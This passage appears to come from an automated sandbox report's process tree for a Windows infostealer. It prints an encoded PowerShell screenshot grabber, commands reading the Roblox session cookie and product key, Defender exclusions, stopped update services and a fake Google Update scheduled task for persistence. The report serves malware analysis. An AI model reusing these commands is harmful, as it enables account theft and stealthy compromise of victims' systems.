QBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                8⤵
                                                                                                                                  PID:4840
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                    9⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:6348
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cd04bldm\cd04bldm.cmdline"
                                                                                                                                      10⤵
                                                                                                                                        PID:7400
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C40.tmp" "c:\Users\Admin\AppData\Local\Temp\cd04bldm\CSC9EDC2C3151424C158D9F25882389E778.TMP"
                                                                                                                                          11⤵
                                                                                                                                            PID:7592
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      8⤵
                                                                                                                                        PID:6612
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          9⤵
                                                                                                                                            PID:6688
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                          8⤵
                                                                                                                                            PID:6728
                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                              tree /A /F
                                                                                                                                              9⤵
                                                                                                                                                PID:6916
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                              8⤵
                                                                                                                                                PID:6948
                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                  tree /A /F
                                                                                                                                                  9⤵
                                                                                                                                                    PID:7280
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:7452
                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                      tree /A /F
                                                                                                                                                      9⤵
                                                                                                                                                        PID:7516
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7540
                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                          tree /A /F
                                                                                                                                                          9⤵
                                                                                                                                                            PID:7620
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:7768
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                              9⤵
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:7820
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:8060
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                9⤵
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:8092
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:9548
                                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                                  getmac
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:9496
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27162\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\hS73s.zip" *"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:9332
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI27162\rar.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI27162\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\hS73s.zip" *
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:9268
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5980
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic os get Caption
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:9128
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:9072
                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:9024
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:8984
                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:8936
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:8904
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:8856
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:8656
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                                      PID:8608
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:8520
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                        9⤵
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:8448
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:5524
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5452
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              sc stop UsoSvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:6248
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:6276
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              sc stop wuauserv
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:6464
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              sc stop bits
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2912
                                                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                                                              sc stop dosvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:6340
                                                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2212
                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                              C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5008
                                                                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:6460
                                                                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4132
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6548
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:9060
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:9040
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:9940
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:8244
                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                            sc stop UsoSvc
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:8196
                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                            sc stop WaaSMedicSvc
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:8180
                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                            sc stop wuauserv
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:8164
                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                            sc stop bits
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:3796
                                                                                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                                                                                            sc stop dosvc
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:8152
                                                                                                                                                                                        • C:\Windows\System32\dialer.exe
                                                                                                                                                                                          C:\Windows\System32\dialer.exe
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:9968
                                                                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:9988
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:9944
                                                                                                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:6244
                                                                                                                                                                                              • C:\Windows\System32\dialer.exe
                                                                                                                                                                                                C:\Windows\System32\dialer.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6504
                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:6064
                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3476
                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.0.1709754611\1289129328" -parentBuildID 20221007134813 -prefsHandle 1684 -prefMapHandle 1676 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {893dc7e8-1b8a-4203-bcd9-7652180e788a} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 1772 2fafff06158 gpu
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4356
                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.1.968909169\1224959659" -parentBuildID 20221007134813 -prefsHandle 2112 -prefMapHandle 2108 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1abad206-ad10-4aba-97ac-545fdda8b1e3} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 2124 2faff03fb58 socket
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:9608
                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.2.546339375\629539912" -childID 1 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bc3b6d6-5bb5-40d5-a27e-204e296afa45} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 2868 2fa837d2758 tab
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2908
                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.3.1818274522\1591361032" -childID 2 -isForBrowser -prefsHandle 2876 -prefMapHandle 3484 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8123600-a8c2-49fe-ac7b-d1edf9156130} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 3496 2fa83cc1258 tab
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:7068
                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.4.13906114\1611447475" -childID 3 -isForBrowser -prefsHandle 3992 -prefMapHandle 3988 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40e7808a-5997-4b2a-a586-bb0bcee30f7c} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 4000 2faff040458 tab
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:10500
                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.5.362134590\1908177861" -childID 4 -isForBrowser -prefsHandle 4876 -prefMapHandle 4872 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8545cb7-f2fa-4cbb-9e1b-09a2b38f8662} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 4888 2fa84d77858 tab
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:11064
                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.6.159653166\1764503194" -childID 5 -isForBrowser -prefsHandle 5044 -prefMapHandle 5048 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e0d8ae8-0070-4956-b95c-96a2534c9039} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 5036 2fa85bbc958 tab
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5316
                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3476.7.536850201\2119833953" -childID 6 -isForBrowser -prefsHandle 5224 -prefMapHandle 5228 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1304 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a7fd286-6e7c-47d9-a3e6-1c48d7e7d2d7} 3476 "\\.\pipe\gecko-crash-server-pipe.3476" 5216 2fa862c5558 tab
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:11084
                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:3840
                                                                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:4048
                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4532
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                                                                                                                                        1⤵
